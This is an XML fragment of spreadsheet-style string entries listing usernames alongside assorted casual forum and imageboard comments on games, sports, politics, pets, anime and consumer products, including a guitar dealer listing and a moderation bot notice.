    <t>He has the talent but has fallen through the cracks in Buffalo. This is the type of move I support. Save your 1st and take a stab at a guy like this. It can only help at this point.</t>
  </si>
  <si>
    <t>calamarimatoi</t>
  </si>
  <si>
    <t>stop conflating things and maybe one day you’ll stop being a lib</t>
  </si>
  <si>
    <t>&gt;&gt;480191447 except the people who fell for it the first place didn't have to pay anything else and it's a pretty stupid to allow those same people to test the beta and proclaim to the world how bad the game was just before it's released do you have brain damage?</t>
  </si>
  <si>
    <t>alanism</t>
  </si>
  <si>
    <t>What are your thoughts on my example of Non-Japanese who practice and evolved Jiu-Jitsu wearing traditional Gi's? There are more non-Japanese practicing Jiu-Jitsu than there is Japanese. There are also more Jiu-Jitsu gyms outside of Japan than there are in Japan. The Brazilian and Americans have and build on and evolved the art form. The Brazilians and Americans have also definitely commercialized the art. Should only Japanese people be allowed to wear Gi's? To me, people who complain about cultural appropriation in regards to yoga are not ones to practice mindfulness meditation or follow yoga philosophy... if they did they would not get upset about others doing yoga. Being bothered or worrying about cultural appropriation is when your thoughts/mind is ruled by emotions, distractions and impulsiveness... Nobody of 'wise mind' or 'reasonable mind' would be concerned of such matters.</t>
  </si>
  <si>
    <t>SleepyConscience</t>
  </si>
  <si>
    <t>The world of Greek Mythology. If those assholes are the most powerful beings in the Universe I'd get depressed pretty quick.</t>
  </si>
  <si>
    <t>eurostylin</t>
  </si>
  <si>
    <t>Who upvotes this trash? This person claims they made $5/hr and now brought home $4598 in a month (equivalent to over 900 hours of working) and OP has "lost so much motivation" who cares. This has nothing to do with FBA. Go talk with someone in /r/personalfinance</t>
  </si>
  <si>
    <t>SloatThritter</t>
  </si>
  <si>
    <t>Chiming in to once again say that wish pays the 2nd most out of all sponsors to be on our chest. Who cares about what they are. They pay 20 mil a year</t>
  </si>
  <si>
    <t>&gt;&gt;811096828 I love when the left eat their own.</t>
  </si>
  <si>
    <t>BlynntopianDescent</t>
  </si>
  <si>
    <t>Im just very talkative and a geek, shes quiet and athletic. Im sure she finds me annoying. The only thing she does is consistantly embarass me in front of peers by showing them my DM's</t>
  </si>
  <si>
    <t>InspectorBooty</t>
  </si>
  <si>
    <t>I don’t understand this take. Those leaves are causing the dated hardware to struggle, something that visual concepts could have seen immediately with ANY amount of quality assurance staff. Don’t turn this into a console war</t>
  </si>
  <si>
    <t>&gt;&gt;13942237 and Rupi Kaur is really good. Whats your point?</t>
  </si>
  <si>
    <t>&gt;&gt;73147818 &gt;Everything the guy codes are 5-10 line snippets Are you his employer? Have you audited all code he had wrote to say that? Haven't you thought that entire point of his repo is to actually share snippets he found useful in his daily work?</t>
  </si>
  <si>
    <t>1234yomama1234</t>
  </si>
  <si>
    <t>What? You either believe the bible is the word of god or you’re catholic. My favourite part of the bible is about the giants and the nephilim.</t>
  </si>
  <si>
    <t>Rumbleinmybumble</t>
  </si>
  <si>
    <t>I'm an RN. I would totally understand that. If she really wants to visit she could shower put on fresh clothes wash her hands and wear a mask. Hell she could probably grab some gowns from work so you know that her clothes aren't a problem. But SHE is a nurse she should know what you guys are talking about and either stay away and FaceTime or go all out with the PPE so that her presence isn't a threat to your child's life. Are you sure it's even an issue with SIL? I can't imagine any nurse not understanding in this situation. I think your MIL might just be a whole can of crazy.</t>
  </si>
  <si>
    <t>boyproblems69</t>
  </si>
  <si>
    <t>no, he had no idea! i’m hoping that is still the case...</t>
  </si>
  <si>
    <t>riddus</t>
  </si>
  <si>
    <t>Mmm... New without the total garbage.</t>
  </si>
  <si>
    <t>Raveynfyre</t>
  </si>
  <si>
    <t>What do they call a couple that uses the pull out method of birth control? . Parents.</t>
  </si>
  <si>
    <t>butteyr</t>
  </si>
  <si>
    <t>I love buying 20 dollar toys just to be ripped apart by my potties 5 minutes later.</t>
  </si>
  <si>
    <t>dTrecii</t>
  </si>
  <si>
    <t>*oldman.exe has failed successfully*</t>
  </si>
  <si>
    <t>elpadrin0</t>
  </si>
  <si>
    <t>&gt; it's speculation at best. Of course its speculation, I never claimed to have any top secret insight. Just like how you're speculating. &gt;he's had his chance, now move on. 8 games into the season and they're 7th? Calm down.</t>
  </si>
  <si>
    <t>VerbalThermodynamics</t>
  </si>
  <si>
    <t>Probably nothing.</t>
  </si>
  <si>
    <t>QuimiQ</t>
  </si>
  <si>
    <t>Here's a LPT for when you are making a lot of hashbrowns (aka Rösti): Put a plate inside your pan that covers pretty much all of your hashbrowns. Flipp your entire pan so the hashbrowns are on your plate. Remove the pan and slide the hashbrowns back into the pan. (also wear gloves or your arm might get covered by hot oil)</t>
  </si>
  <si>
    <t>Yjames2</t>
  </si>
  <si>
    <t>You don’t have to use the mod that takes half your super. It’s the trade off to getting heavy.</t>
  </si>
  <si>
    <t>LSines2015</t>
  </si>
  <si>
    <t>2K could’ve agreed to deals with those individual people</t>
  </si>
  <si>
    <t>asiaquagmire</t>
  </si>
  <si>
    <t>Oh lord. I have 18 days logged on just bedrock edition alone. I have no idea the ridiculous time I have logged on Java, but I know it’s something insane.</t>
  </si>
  <si>
    <t>Tury92</t>
  </si>
  <si>
    <t>Pretty much this. I think eventually when games get more optimized to use higher thread counts eventually the 3700x will surpass the 9700k. The 9700k is only better at the moment because of it's better IPC than Amds chips. If all your doing is gaming right now and you want the absolute best performance, go with the 9700k. If you dont want to worry about your CPU becoming "outdated" because of a low thread count I'd go with the 3700x. I personally went with a 9700k because I'm not too worried if I need/ want to upgrade to a better processor in a year or two.</t>
  </si>
  <si>
    <t>&gt;&gt;40251487 What a day to be a groudonfag</t>
  </si>
  <si>
    <t>pinkliar</t>
  </si>
  <si>
    <t>Quote: from: Saverenergy on Today at 02:21:33 PM You are right that 90 percent of all cryptocurrencies are scammers or unsuccessful projects. But in 2011 there wasnt as much crap and scam as it is now. totally agree , there are too many scam and shit token created day by day unlike before that there are many people dont have idea how blockchain works .</t>
  </si>
  <si>
    <t>PlotoZypresse</t>
  </si>
  <si>
    <t>He looks so sad. Now I am sad</t>
  </si>
  <si>
    <t>mmdpri</t>
  </si>
  <si>
    <t>Why do people ask these weird questions ! I would do it too if I had a photo with her, no reasons, I just love it .</t>
  </si>
  <si>
    <t>Samuelmc24</t>
  </si>
  <si>
    <t>Nah the OG V2s are way better than the newer ones. The sply 350 are where it’s at. That’s why they’re the most expensive and sought after too</t>
  </si>
  <si>
    <t>erasmause</t>
  </si>
  <si>
    <t>&gt;Be proud of your child’s ~~achievements~~ effort, perseverance, and resilience.</t>
  </si>
  <si>
    <t>stay_fr0sty</t>
  </si>
  <si>
    <t>So this will go on for years until China can squash it quietly or there is a war. No way China is just going to give up...they can just wait.</t>
  </si>
  <si>
    <t>wheels1989</t>
  </si>
  <si>
    <t>You also now in the lobbys with PC players. So a pc player with the same kd as you will definitely have an advantage. That's why you are seeing people build up 6 stories. I feel the same every player I spectate builds and edits way to fast to be on a controller. This game is about to die on console.</t>
  </si>
  <si>
    <t>maxpleasethisisbox</t>
  </si>
  <si>
    <t>Imagine reading about a guy in the ICU potentially permanently disfigured, and the first thing you do is preach about how big of a piece of shit the guy is You are a sad, sad man</t>
  </si>
  <si>
    <t>LionOfARC</t>
  </si>
  <si>
    <t>&gt;...it makes me question why they even bothered to adapt it in the first place if justice wasn’t gonna be done to it. Money.</t>
  </si>
  <si>
    <t>Interferon</t>
  </si>
  <si>
    <t>I cannot go goddamn ANYWHERE without fucking MUSIC BLARING over the restaurant/coffee shop/grocery store speakers. what if i don't LIKE your fucking music??? what if i would like some GODDAMN FUCKING SILENCE I honestly believe this is some sort of globalist psychological torture to keep us fro being able to ever think Quoting: Anonymous Coward 77743900 YOU CAN'T PUMP GAS WITHOUT A FUCKING TV SCREEN IN YOUR FACE BLARING OUT SUBLIMINAL MESSAGING AND MORE! Quoting: Anonymous Coward 62916506 One place electric cars are better. Just charge at home.</t>
  </si>
  <si>
    <t>mrCloggy</t>
  </si>
  <si>
    <t>Don't forget to hold a referendum in between :-)</t>
  </si>
  <si>
    <t>thorsten139</t>
  </si>
  <si>
    <t>The one I made your mum wear? Pretty good</t>
  </si>
  <si>
    <t>4th iteration</t>
  </si>
  <si>
    <t>Hey "nephew" here's $1000 bucks get in front of a camera and say this line signed HPD</t>
  </si>
  <si>
    <t>jaeger-123</t>
  </si>
  <si>
    <t>Bit late, but getting to watch a Panther in 32c weather at tankfest this year was a serious privilege. She nearly bowed out but managed a few laps!</t>
  </si>
  <si>
    <t>mettyc</t>
  </si>
  <si>
    <t>The law is not always just. Peaceful civil disobedience is not just a good action, it is often a necessary action in order to draw attention to unjust laws. If the government made football illegal, an act of civil disobedience would be to play football in a public space. Would that lead to the downfall of society? No. If a law is unjust, and the political world is failing to address is, then civil disobedience is the *only* way for the public to make their voice be heard.</t>
  </si>
  <si>
    <t>Articdairyfrog</t>
  </si>
  <si>
    <t>A mini blep for your Saturday</t>
  </si>
  <si>
    <t>Mandrill</t>
  </si>
  <si>
    <t>Wasn't there some prospect of £1 a share being held back pending the court case? By the time we get it - if we get it - it'll be worth half that.</t>
  </si>
  <si>
    <t>Vicinalvictor</t>
  </si>
  <si>
    <t>My Dad said several years ago, "The best thing about going anywhere was coming home".</t>
  </si>
  <si>
    <t>Gauntlets28</t>
  </si>
  <si>
    <t>Suddenly I'm in the mood for some [S A I N T P E P S I.](https://www.youtube.com/watch?v=qzj4gHuH2LA)</t>
  </si>
  <si>
    <t>DeepRoots43</t>
  </si>
  <si>
    <t>I got my vaccinations, and still got whooping cough... so doubt it was her fault.</t>
  </si>
  <si>
    <t>coldgator</t>
  </si>
  <si>
    <t>No shit that's why I haven't actually done it</t>
  </si>
  <si>
    <t>He looks kind of strange for sure. It may be a case of seeing someone look a certain way (buzzcut), for years and years, then the shock of seeing them look different after all that time of getting used to a certain look.</t>
  </si>
  <si>
    <t>whywontmynamework</t>
  </si>
  <si>
    <t>It's called an opinion you pretentious douche. You're a child regardless of your age. This entire time you're backpedaling trying to explain your absolutely terrible comments of relating a half god half mortal to a half white half Asian. That's apples to oranges if I've ever fucking seen one lmao. You're just an idiot who still hasn't compiled any real argument other than that isn't how genes work...when being a god isn't in his genes it was a title given to him. Oh and the fact that they have beds and sleep...yeah really got me with that one there.</t>
  </si>
  <si>
    <t>Schnectadyslim</t>
  </si>
  <si>
    <t>&gt; How did he do that? By doing this &gt;But Vlaming called the student female pronouns behind his back to classmates, his lawsuit said, leading to meetings of the teacher, student, the student’s mother and various school administrators, who all asked Vlaming to use the proper pronouns. &gt;The teacher is not claiming that he was calling the student she. The teachers lawsuit says exactly that, as was quoted above. Same answer to both questions.</t>
  </si>
  <si>
    <t>Ihavesubscriptions</t>
  </si>
  <si>
    <t>Yeah. We're almost definitely never getting anything that's different from just a normal, bipedal race. We only got Vulpera because they used the goblin skeleton for them. Everyone really wanted Sethrak, but they've got a weird shape, so...nope.</t>
  </si>
  <si>
    <t>drdrillaz</t>
  </si>
  <si>
    <t>It’s about 20%if the cost of gas</t>
  </si>
  <si>
    <t>hellgirldeity</t>
  </si>
  <si>
    <t>I watched a vid where one of the creators said that the reason they didn't give Link a hat in this version is because as the graphics improve it gets harder to make the hat look cool. Sorry if this is old news.</t>
  </si>
  <si>
    <t>LaBamba said: ↑ 30 years, and not one mention of Kent marrying or having kids? It’s clear what kind of relationship this was, and I’m happy Kent got something after being exploited as a youth by that old crusty man. Click to expand... He's got his own family. His main complaint is how long the case has taken while his main assets were tied up in the land, forcing him back to his former occupation of fisherman to provide for his family of seven children. Click to expand... Party Island Lord's devoted manservant wins £20m slice of his fortune | Daily Mail Online</t>
  </si>
  <si>
    <t>Fellinlovewithawhore</t>
  </si>
  <si>
    <t>Because the welfare of the child takes precedent. The State doesnt want to pay for it so they find the easiest sucker to stick the bill to.</t>
  </si>
  <si>
    <t>PimpleShrimp</t>
  </si>
  <si>
    <t>Dude it’s a fuckin joke. That’s the point of a meme. The degenerates on this platform are growing.....</t>
  </si>
  <si>
    <t>xveganrox</t>
  </si>
  <si>
    <t>No, the stuff from the 4 IB bounties is though</t>
  </si>
  <si>
    <t>gyrk12</t>
  </si>
  <si>
    <t>Any reasons why swans was locked out? Two of their albums had 9+</t>
  </si>
  <si>
    <t>AetherLock</t>
  </si>
  <si>
    <t>You capitalise really weirdly in your writing fam</t>
  </si>
  <si>
    <t>BeauDiu</t>
  </si>
  <si>
    <t>Yeah mine did. Waiting up to 30 minutes for a game to load for it to fail.</t>
  </si>
  <si>
    <t>EverydayTreasureHunt</t>
  </si>
  <si>
    <t>Aaaaah That’s So sweet! My parents also still get out my old Duplo when my daughter comes over: timeless! Terrier is great, and I am not sure if I like that clown or think it is scary!</t>
  </si>
  <si>
    <t>BKachur</t>
  </si>
  <si>
    <t>Median officer salary is 60k with a pension. Having 60 without having to save for retirement is the equivalent of making 85k which isn't that bad all things considered.</t>
  </si>
  <si>
    <t>Barg</t>
  </si>
  <si>
    <t>Originally posted by kellbys ↑ Trumps big problem is his big mouth and that he's an egotistical pathological liar! Case in point, claimed he should be awarded the Nobel Peace prize for disarming Nuclear North Korea and berated Obama for failing to do so. Well Trumpy, sad reality is you have achieved nothing with North Korea except pander to another despot ego maniacs desires for a few photo shoots. Rocket Man still has his Nukes and Trump is looking like a piss weak leader who can't get anything done! US nuclear talks with North Korea break down. "The first negotiations in eight months between the Trump administration and North Korea aimed at breaking the logjam over dismantling the North's nuclear program collapsed in Stockholm on Sunday (AEST), only hours after they began, the North Koreans said.It was the latest indication that President Donald Trump's signature diplomatic initiative has stalled." https://www.copyright link/world/as...rth-korea-break-down-in-hours-20191006-p52y2s Expand Frankly, Kelbys, I'm amazed that Trump can tie his own shoelaces. Furthermore, pandering to a mass murderer like Kim, and calling him your great friend makes Trump complicit in evil. It might interest the readers to know that Trump, in his infinite stupidity and arrogance, had a coin struck in 2017/18 with his and Kim's image. Despotic birds of a feather immortalized in metal.</t>
  </si>
  <si>
    <t>Viviolet</t>
  </si>
  <si>
    <t>NTA. My father had my childhood dog put down when my boy was very old, fully blind and mostly deaf. My beloved pup had lost a lot of weight and wasn't doing well, and I knew that. I only wish my dad had given me the opportunity to be there with my good boy at the vet when he passed. No call, no text, nothing. He was just gone. That will forever be a loss I carry with me because I never got to say goodbye. You gave your SO many opportunities to not be selfish and to even be there with Grinch for her final moments. I wish I had gotten that chance.</t>
  </si>
  <si>
    <t>billybobjimmyjoe</t>
  </si>
  <si>
    <t>Cousin Jerry.</t>
  </si>
  <si>
    <t>TWX</t>
  </si>
  <si>
    <t>Secret Master of All Flatulence : Chinesenookiefactory: I feel sorry for the nephew. He's 8 years old and saw his aunt shot dead. He's also going to get his ass beat for farking up his family's narrative by admitting she was pointing a gun at the cop. Not necessarily. He can't prove that she was point a gun at a person. He also can't prove that she knew that any of them were cops.</t>
  </si>
  <si>
    <t>ThomasRaith</t>
  </si>
  <si>
    <t>ACTUAL FACT. IN THE MIDDLE AGES THE CHURCH SAID YOU COULDN'T EAT MEAT ON FRIDAY BUT YOU COULD EAT FISH. IT WAS QUESTIONED WHETHER A BEAVER WAS MEAT OR FISH SINCE IT LOOKED LIKE MEAT BUT LIVED IN THE WATER. THE FINAL DETERMINATION WAS THAT BEAVERS WERE MEAT, EXCEPT THE TAIL, WHICH WAS FISH. SO IT WAS ACCEPTABLE TO EAT BEAVER TAILS ON FRIDAYS.</t>
  </si>
  <si>
    <t>HigglyMook</t>
  </si>
  <si>
    <t>Different strokes. I just couldn't make myself like the nexus building. It was buggy, decay layouts, fragment number cap, etc. I can't see the whole thing ever becoming fun. Maybe if they rebuilt the mechanic from ground up it could become better, but that would make it a different league wouldn't it?</t>
  </si>
  <si>
    <t>Glarghl01010</t>
  </si>
  <si>
    <t>By getting these people punished with a fine they'll probably never pay after court fees? When the other end of the spectrum is hongkong, id rather have to pay for a paint job and be miffed for a few days.</t>
  </si>
  <si>
    <t>poptartheart</t>
  </si>
  <si>
    <t>Who is crazy? Me or the owners of zeke, cook, CMC, and kamara (im targetting all these top RBs in trades. Im asking for thier no.1 RB for tyreek hill and aaron jones. The trade calculators say its a good trade AND none of them have an elite WR like Hill What am i doing wrong!? I drafted damien williams(been plugging in miles sanders while hes been hurt lol) and aaron jones and its not been great lol</t>
  </si>
  <si>
    <t>Latinkuro</t>
  </si>
  <si>
    <t>There is no matrix without Keanu Reeves. Don't even try.</t>
  </si>
  <si>
    <t>mtm4440</t>
  </si>
  <si>
    <t>What is the need for this? Why can't you just use a transparent image over a character? It is possible to put the Rochester symbol into your own created font if you really needed it. But like LtPowers said, you won't be able to copy/paste it from the Internet because it's not part of the standard characters.</t>
  </si>
  <si>
    <t>maddzlee</t>
  </si>
  <si>
    <t>This is about 9 and a half months</t>
  </si>
  <si>
    <t>Nooting_Penguin</t>
  </si>
  <si>
    <t>Yeah, I've had that happen a few times. Everyday is an adventure driving. I had to drive 4 miles yesterday and saw two loons in that time. Someone doing a U-turn but instead of the usual,they dipped into a side street, quickly turned around nearly hitting a pedestrian crossing at the corner, driver gets back onto main road and switches lane almost into the side of someone. Then a fruitcake who was leaving McDonald's and waiting to get onto the main road but it was a red so cars were sitting there including me. They got pissed they were stuck till traffic moved. Proceeded to chase me down, drive up besides blaring horns, flipping me off. Then continually change lanes in front of me, besides me. Then try to brake check and drive like 30 in a 45 for a mile or so till I turned off on an alternative route.</t>
  </si>
  <si>
    <t>StreetFlow</t>
  </si>
  <si>
    <t>I love that city. Had a really good time in Malta and I want to go back.</t>
  </si>
  <si>
    <t>TheLastNimrod</t>
  </si>
  <si>
    <t>Tyson fury knows how to play the money game, fair play to him. He's a promoters dream.</t>
  </si>
  <si>
    <t>MyUsernameWasTaken95</t>
  </si>
  <si>
    <t>Definition of "end to end football". Nice physics EA</t>
  </si>
  <si>
    <t>Miami-Guitars</t>
  </si>
  <si>
    <t>Miami-Guitars is an authorized Fender Showcase Dealer/ Factory warranty included. If you have any questions or concerns regarding the instrument of your interest, please send us a message via email Info@miami-guitars.com Weight 5 Lbs 5.2 Oz Specs: Model: American Acoustasonic Telecaster Exotic Finish Color: Natural Finish Type: Open-Pore Satin Urethane Finish Top Wood: Ziricote Body Wood: Limba Neck Wood: Limba Neck Shape: Modern Deep C Neck Dimensions: .830 1st - .930 12th Fingerboard: Ebony Fingerboard Radius: 12" Nut Material: Graph Tech Tusq Nut Width: 1.6875" Frets: 20 Narrow Tall Pickups: Fishman Acoustic Engine, Fender Acosutasonic Noiseless Single-Coil Controls 1 Volume, 1 Mod Knob, 5-Way Hardware: Nickel/Chrome Tuners: Chrome w/Black Buttons Bridge: Modern Asymetrical Case: Hardshell Fender Case Is this the Fender LTD Ziricote Acoustasonic you've been looking for? Call Kenny at : 786-275-6700 (Mon-Sat) for more info Thanks for viewing!</t>
  </si>
  <si>
    <t>Bryoneehhh_</t>
  </si>
  <si>
    <t>trans people just want to live normal lives as the gender they know they are. no, they aren't sick and deluded fetishists. no, they aren't twisted perverts. no, they aren't "lesbians taking advantage of the patriarchy". they're just normal people who happened to have a mismatch between brain and body. thanks for listening to my ted talk.</t>
  </si>
  <si>
    <t>c-_-stanga</t>
  </si>
  <si>
    <t>not to be that guy but I find it hard to believe that a 10k and 5k would start from the same exact spot at the same time. I feel like this kid prolly had a half hour head start or started a mile shorter or something... doesn't add up</t>
  </si>
  <si>
    <t>ElAsko</t>
  </si>
  <si>
    <t>Necessary - one collar, two sleeves (1 c and 2 s) Un-necessary, because U-necessary isn't a thing Che bol</t>
  </si>
  <si>
    <t>poli_pore</t>
  </si>
  <si>
    <t>They basically denied any wrongdoing or culpability whatsoever in that meeting, so probably not</t>
  </si>
  <si>
    <t>NoSkinBot</t>
  </si>
  <si>
    <t>**Unfortunately, we've had to remove your post.** ___ ### Post Flair Guidelines We require all users to set a post flair for their own post. There is a 30 minute grace period, and this has passed for this post. Don't know how to flair your post? Click [here](http://imgur.com/a/m3FI3) to view this helpful guide on how to flair your post. For more information, please read [**our subreddit rules.**](https://www.reddit.com/r/FortniteBR/wiki/rules) - If you have any queries about this, you can contact us via [Moderator Mail](https://www.reddit.com/message/compose?to=%2Fr%2FFortniteBR).</t>
  </si>
  <si>
    <t>Lord_of_Potatoes14</t>
  </si>
  <si>
    <t>I remember watching someone pierce a pack with a straw and twist it go drink its juice. The juicer is literally 2 iron plates that squishes the fruit mush pack to get its juice out for you.</t>
  </si>
  <si>
    <t>sircrispybacon1982</t>
  </si>
  <si>
    <t>Do you use your bare hand to wipe your ass? No? Then stfu.</t>
  </si>
  <si>
    <t>golan-trevize</t>
  </si>
  <si>
    <t>If you have liked the [first one](https://www.reddit.com/r/RetroFuturism/comments/dh13hy/dune_by_frank_herbert/?utm_source=share&amp;utm_medium=ios_app&amp;utm_name=iossmf) then you will definitely love the second one though.</t>
  </si>
  <si>
    <t>highbread1</t>
  </si>
  <si>
    <t>Good analogy, from everything i said you just took the thing that best suited you...</t>
  </si>
  <si>
    <t>chara4242</t>
  </si>
  <si>
    <t>nah i wouldnt care if the next one was black but it pissed me off when they made the doctor a girl</t>
  </si>
  <si>
    <t>BiemBoemBam</t>
  </si>
  <si>
    <t>you will know if there is anything after and what death is like</t>
  </si>
  <si>
    <t>DonKeighbals</t>
  </si>
  <si>
    <t>Head east on AZ State Route 88 (The Apache Trail) from US Highway 60. Follow the signs towards Tortilla Flats. It’s an easy drive and one of the the most beautiful ones you’ll find in the area. The road turns to dirt a few miles past Tortilla Flats but it’s doable in a sedan.</t>
  </si>
  <si>
    <t>ZetaEtaTheta</t>
  </si>
  <si>
    <t>If the quality of the visuals is as good as the pictures, then It is good enough for flight sims, and that's pretty amazing</t>
  </si>
  <si>
    <t>manderrx</t>
  </si>
  <si>
    <t>Ah, the one who is always undecided until 2 seconds before the vote.</t>
  </si>
  <si>
    <t>corndog54</t>
  </si>
  <si>
    <t>I hate when people do that shit. Like who the hell are they to say who you are and aren't related to?</t>
  </si>
  <si>
    <t>arista</t>
  </si>
  <si>
    <t>Quote: : They managed to kill 4 officers with a knife before being taken down? jeez They had no idea 16 years working in IT. Maybe soon to get layed off</t>
  </si>
  <si>
    <t>asingingsiren</t>
  </si>
  <si>
    <t>They seem to base a lot of the content on real stories/cases that happened in the U.S.A</t>
  </si>
  <si>
    <t>RogerLeClerc</t>
  </si>
  <si>
    <t>FPTP is what has created cretins like Farage and that communist bitch. Lack of representation for fringe views -&gt; resentment -&gt; fodder for demagogues. PR will let minority parties into politics, and we have seen time and time again that when populist parties actually have to work, they fall apart. Problem solved.</t>
  </si>
  <si>
    <t>Grace Voegeli</t>
  </si>
  <si>
    <t>" A wonderful company. So much attention to detail. Would absolutely purchase from again. "</t>
  </si>
  <si>
    <t>_Peter-Griffin_</t>
  </si>
  <si>
    <t>This</t>
  </si>
  <si>
    <t>Murricles92</t>
  </si>
  <si>
    <t>[North Texas SC] BREAKING NEWS We'll have a new home beginning in 2020❗️(Globe Life Park, former home of the Texas Rangers)</t>
  </si>
  <si>
    <t>EsotericGroan</t>
  </si>
  <si>
    <t>It will be political suicide for some of them no matter how they vote.</t>
  </si>
  <si>
    <t>DankAxu</t>
  </si>
  <si>
    <t>They literally banned a player for showing support for Hong Kong</t>
  </si>
  <si>
    <t>Goblin Slayer</t>
  </si>
  <si>
    <t>The F-35 is one of the best fighters in the world. This is just more anti-American propaganda bullshit since Japan and Poland are buying it in large numbers. The bugs, if there were any, have likely been fixed by now. Quoting: Goblin Slayer You are 100% WRONG. There are hundreds of problems with the aircraft. The stealth coatings on the F-35 and F-22 deteriorate over time. They are rusting. Russian and Chinese radars can detect and track all of America's stealth aircraft. The main reason to continue to produce these aircraft is profit. These aircraft work well against countries that don't have advanced radars, like Botswana or Fiji. Quoting: Anonymous Coward 77917930 If there were really hundreds of problems with the aircraft, then other countries wouldn't be buying them. Derp.</t>
  </si>
  <si>
    <t>acrediblesauce</t>
  </si>
  <si>
    <t>It’s basically made out of lines</t>
  </si>
  <si>
    <t>&gt;&gt;267691091 no it wasn't. that makes 0 sense. if he wanted people to stop the namefag circlejerk he would stop shitposting and attention whoring with his trip instead of trying his hardest to incentivize it</t>
  </si>
  <si>
    <t>slc1987</t>
  </si>
  <si>
    <t>As someone else has commented, they don’t speak Guaraní. One film you might check out is La Hamaca Paraguaya - it’s a slow moving drama between an older couple and when I feel homesick for Paraguay and the beautiful Guaraní language, I put that on (even if they’re occasionally arguing ) ahechaga’u asy pe tetã mombyryha chehegui ha iñe’ê iporã eíraichaite</t>
  </si>
  <si>
    <t>BrotherDomN</t>
  </si>
  <si>
    <t>I think it like the game Minecraft where people need to go to a different realm to get to the end boss but I haven’t talk to anyone who went to the other side yet but I still keep hope that one day I can someone will come back</t>
  </si>
  <si>
    <t>hfdrjnvcd</t>
  </si>
  <si>
    <t>I love spreadsheets. Stupid question: Is there a way to reduce class ability like paragon mods did? I loved sporting 5 of them for dragon’s shadow...</t>
  </si>
  <si>
    <t>RawPow</t>
  </si>
  <si>
    <t>UPDATE: Thank you all guys...I've just bought the switch lite + Zelda!</t>
  </si>
  <si>
    <t>ravenpotter3</t>
  </si>
  <si>
    <t>The one where you are a mayor and command over a town of animals</t>
  </si>
  <si>
    <t>nopantsdota</t>
  </si>
  <si>
    <t>the grin on his face said everything for me</t>
  </si>
  <si>
    <t>lalo1313</t>
  </si>
  <si>
    <t>I will give that food a try. Arnie is so picky but he is doing well on Royal Cainin mother/kitten wet and kibble. Super high calorie so on days when he has a flare up he maintains his weight. Funny thing, I can tell by how big he yawns what kind of day he is having. If he is hurting he does tiny yawns and cries a tiny bit. He is really stable now as well. Big wide kitty yawns! So glad Plague is stabilized, such a crappie hand they have been dealt. I love him so, I will go broke if necessary.</t>
  </si>
  <si>
    <t>tallyho2go</t>
  </si>
  <si>
    <t>I have several presets in multi-order shipping that do not work. I do not know how to delete them to try tomake new ones that work. I do not need advice on making new presets, just on how to delete the old ones.</t>
  </si>
  <si>
    <t>kottoner</t>
  </si>
  <si>
    <t>I love this. He really seems affected by his loss to Fredericks, as he should be. Great way to make wins and losses matter, even for young lions.</t>
  </si>
  <si>
    <t>Thor1noak</t>
  </si>
  <si>
    <t>When you go from poor to being rich you consider that you earned it all. You deserve it after your hard work right? Why would anyone be entitled to any of *your* money now that you are rich? Fuck em. That, I imagine, might be what's going inside a newly rich person's head.</t>
  </si>
  <si>
    <t>SAP Technical Specialist</t>
  </si>
  <si>
    <t>full-time Well known Company with good track record. Long list of clients with no shortage of projects. Cons Seem to not vet many of their employees, and try to fill seats. A lot of non technical personnel involved in technical decisions slow down processes significantly.</t>
  </si>
  <si>
    <t>immortal_banana</t>
  </si>
  <si>
    <t>Well then why did you tell me and rob me of my bliss you asshole</t>
  </si>
  <si>
    <t>elliotdrumma</t>
  </si>
  <si>
    <t>Yeah because EU clearly doesn't have any good teams. It's not like fnatic got to the final last year, G2 won MSI and we have 3 teams in the quarter finals. Must all just be luck and the "shitty format".</t>
  </si>
  <si>
    <t>Sandon</t>
  </si>
  <si>
    <t>Got a bunch of pavers left from an old shed.</t>
  </si>
  <si>
    <t>cincyirish4</t>
  </si>
  <si>
    <t>It’s amazing the clips we provide the world to show how awful we are. That clip of Dalton being carried is just pathetic</t>
  </si>
  <si>
    <t>jpritchard</t>
  </si>
  <si>
    <t>The real threat is global warming now. We should keep a flame going until people stop burning fossil fuels... wait.</t>
  </si>
  <si>
    <t>jkubed</t>
  </si>
  <si>
    <t>Finished Heartcatch Precure. the first I've seen to completion, started after a few months of Star Twinkle. [any show with a good ol' Gainax Pose can't be bad (spoiler image).](https://imgur.com/ttHbG7I) around halfway through I realized that the more I watched it, the less I liked Star Twinkle. not to the point of dislike, just... *less*. [HCP](/s "spending over half the series just getting to know the two mains while meeting the newcomers in the background over time was a great way to nurture emotional attachment to everyone. every standalone episode is very clearly built around whatever theme to the point that you usually know who will be attacked and why within the first ~5 minutes, which was well done. I think the biggest standout for me was the episode with the girl taking care of her sister after their mom died.") [HCP](/s "Cure Moonlight is just the coolest, easily my favorite. I love the idea of the older Precure that clearly has more fighting experience and helps them strategize. I was really surprised they *didn't* cheapen Cologne's sacrifice by reviving him because kid's show, instead forcing her to work through and grow because of those emotions.") [HCP](/s "~~the collective Stand~~ Heartcatch Orchestra was such a cool powerup, but the Fortissimo was definitely the most fun to watch with all the explosions.") [HCP](/s "I got more out of the emotional peak of ep 37-38 where the girls confront their flaws than the plot climax in the last few episodes, but my god the final fight was just a spectacle. Am I forgetting Dune's motive or was he just a dick? on the wiki it describes his childhood but that seems like it's from the novel.") also, the opening is likely one of my top 10 ever. it is so relaxing I swear the girls hit me with a Forte Wave, I'm listening to it on repeat. [](#comfy) Throughout the series I saw myself rating it everything between 6 and 9, but at this point I just really like it a lot. If I rewatched it I think I'd love it throughout since I just like watching them. [final score:](/s "9/10.") tags for the heartcatch fans I can think of off the top of my head: /u/lilyvess /u/helioa /u/amhpanther</t>
  </si>
  <si>
